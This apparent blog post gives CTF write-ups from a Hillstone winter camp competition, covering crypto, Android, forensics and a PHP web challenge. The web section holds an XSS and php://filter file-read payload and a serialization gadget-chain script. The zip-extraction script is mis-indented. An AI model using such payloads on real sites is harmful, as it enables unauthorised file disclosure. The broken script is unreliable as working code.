第二届山石网科冬令营

Mobile

HSAndroid1


网上找了个脚本,AES解密即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
package Crypto;
import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.Base64;

import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class Crypto {


    public static String decrypt(String str2, String str22, SecretKey secretKey, IvParameterSpec ivParameterSpec) throws IllegalBlockSizeException, BadPaddingException, InvalidKeyException, InvalidAlgorithmParameterException, NoSuchAlgorithmException, NoSuchPaddingException {
        Cipher instance = Cipher.getInstance(str2);
        instance.init(2, secretKey, ivParameterSpec);
        return new String(instance.doFinal(Base64.getDecoder().decode(str22)));
    }


    public static void main(String[] args) throws InvalidKeyException, IllegalBlockSizeException, BadPaddingException, InvalidAlgorithmParameterException, NoSuchAlgorithmException, NoSuchPaddingException {
        String decryptedString = decrypt("AES/CBC/PKCS5Padding", "HyKsaPpqT4l436tHiSEXtIlLgVV4GE7mGc2WoI0KlP2YhKFco7OPcJYtS58BFwDq", new SecretKeySpec(new byte[]{12, 32, 13, 14, 23, 108, 31, 108, 44, 121, 42, 121, 42, 113, 41, 124}, 0, 16, "AES"), new IvParameterSpec(new byte[]{12, 32, 13, 14, 23, 108, 31, 108, 44, 121, 42, 121, 42, 113, 41, 124}));
        System.out.println("After decryption - " + decryptedString);
    }
}

//hsnctf{android_is_not_e4sy_will_caref1ul}

CRYPTO

daobudao

1
2
3
4
5
6
7
a3ZxZndpe2owMGdfb3hmbl9rZHloX2l4cX0=

base64:
kvqfwi{j00g_oxfn_kdyh_ixq}

caeser 3:
hsnctf{g00d_luck_have_fun}

strange_chacha

CryptoCTF Aniely原题 参考春哥的wp:https://zhuanlan.zhihu.com/p/545950898

chacha流密码,产生一段密钥流用于加密,类似伪随机数发生器,产生密钥流 。爆破一个短随机数即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
from struct import *
from os import *
import itertools

class AS:
    def __init__(self, passphrase):
        self.passphrase = passphrase

    def go(self):
        def mixer(u, v):
            return ((u << v) & 0xffffffff) | u >> (32 - v)

        def forge(w, a, b, c, d):
            for i in range(2):
                w[a] = (w[a] + w[b]) & 0xffffffff
                w[d] = mixer(w[a] ^ w[d], 16 // (i + 1))
                w[c] = (w[c] + w[d]) & 0xffffffff
                w[b] = mixer(w[b] ^ w[c], (12 + 2*i) // (i + 1))

        bring = [0] * 16
        bring[:4] = [0x61707865, 0x3320646e, 0x79622d32, 0x6b206574]
        bring[4:12] = unpack('<8L', self.passphrase)
        bring[12] = bring[13] = 0x0
        bring[14:] = [0] * 2

        while True:
            w = list(bring)
            for _ in range(10):
                forge(w, 0x0, 0x4, 0x8, 0xc)
                forge(w, 0x1, 0x5, 0x9, 0xd)
                forge(w, 0x2, 0x6, 0xa, 0xe)
                forge(w, 0x3, 0x7, 0xb, 0xf)
                forge(w, 0x0, 0x5, 0xa, 0xf)
                forge(w, 0x1, 0x6, 0xb, 0xc)
                forge(w, 0x2, 0x7, 0x8, 0xd)
                forge(w, 0x3, 0x4, 0x9, 0xe)
            for c in pack('<16L', *((w[_] + bring[_]) & 0xffffffff for _ in range(16))):
                yield c
            bring[12] = (bring[12] + 1) & 0xffffffff
            if bring[12] == 0:
                bring[13] = (bring[13] + 1) & 0xffffffff

key = '52f0907eca3ce05d8d0b6691bb8c8dbca19b63b7bcfcf033fc320f182b5ad610'
enc = '6d9b546c9f1f5e7116203933dabbf25e3a0e143122b20c27e5c83ea26b9d0dbb'

key, enc = map(bytes.fromhex, (key, enc))

key = (key * (32 // len(key) + 1))[:32]

for rand in itertools.product(range(256), repeat=2):
    stream = AS(key)
    rand = bytes(rand) * 16
    passphrase = bytes(a ^ b ^ c for a, b, c in zip(enc, stream.go(), rand))
    msg = bytes(a ^ b for a, b in zip(passphrase, key))
    if (msg.startswith(b'HSNCTF{')):
        print(msg)
        
#HSNCTF{91404a209e0f9ab7d245d5ee}

brute_vigenere

密码表里多了一对括号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import string
import itertools

dicts = string.ascii_lowercase +"{}"
#print(dicts)
# key = (''.join([random.choice(dicts) for i in range(4)])) * 8
enc = '{mvjk}gbxyiutfchpm}ylm}a}amuxlmg'
for k in itertools.product(dicts,repeat=4):
    key = ''.join(k)
    # print(key)
    numenc = [dicts.index(i) for i in enc]
    numkey = [dicts.index(i) for i in key]
    flag = ''
    for i in range(len(enc)):
        # assert len(numenc) == len(numkey)
        ans = (numenc[i] - numkey[i % 4]) % 28
        flag += dicts[ans]
    if 'hsnctf' in flag:
        print(flag)
        break
            
#hsnctf{wecanalwaystrustvigenere}

MISC

签到题

公众号回复签到题即可
hsnctf{welcome_to_hsnctf}

extract

根据Cloakify.txt名字知道是Cloakify隐写 :https://github.com/TryCatchHCF/Cloakify
得到一个txt文件 根据PK得知为zip文件 改后缀 发现是压缩包套娃

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import zipfile
from binascii import *

name = 'f2332'
num = 1
while True:
    fz = zipfile.ZipFile(name + '.zip', 'r')    #读取zip文件
password = name
for i in fz.namelist():         #遍历zip内文件名
    if "zip" in i:      #判断当前文件是否是zip文件
        newpassword = i[0:-4]   #压缩密码为zip文件名,取出
print(newpassword)
# fz.extractall(pwd=bytes(password, 'utf-8'))       #提取zip文件
fz.extractall()
num +=1
name = newpassword

解开套娃之后即可得到flag
hsnctf{66eec912-e9ce-4e1d-ac54-ecea075dcb96}

外星电波~


flag.txt比flag.rar小很多怀疑有其他文件 但binwalk无果 在010发现hillstone.wav Ntfs隐写 导出wav文件

SSTV解密

flag.txt base64转zip文件 解压即可得到flag
hsnctf{70995fb0-eb60-0787-f305-77066aeb6730}

WEB

Primitive php

参考:https://blog.csdn.net/cjdgg/article/details/115314651
用Exception和<script>alert("1")</script>绕过
payload:?class1=Exception&a=<script>alert('1')</script>&class2=Exception&b=<script>alert('1')</script>&class3=SplFileObject&c=php://filter/convert.base64-encode/resource=hint.php
拿到源码构造payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
class blue
{
    public $b1;
    public $b2;

    public function __construct($b1)
    {
        $this->b1 = $b1;
    }
}

class red
{
    public $r1;

    public function __construct($r1)
    {
        $this->r1 = $r1;
    }
}

class white
{
    public $w;

    public function __construct($w)
    {
        $this->w = $w;
    }
}
class color
{
    public $c1;

    public function __construct($c1)
    {
        $this->c1 = $c1;
    }

}

$f = new color("php://filter/convert.base64-encode/resource=flag.php");  
$e = new red($f);
$d = new blue($e);
$c = new color($d);
$b = new white($c);
$a = new red($b);
echo urlencode(serialize($a));

ICS

S7_analysis


hsnctf{399}

CTF > Write Up
#Write Up
第二届山石网科冬令营
https://g1at.github.io/2023/02/06/2023山石冬令营/
作者
g0at
发布于
2023年2月6日
许可协议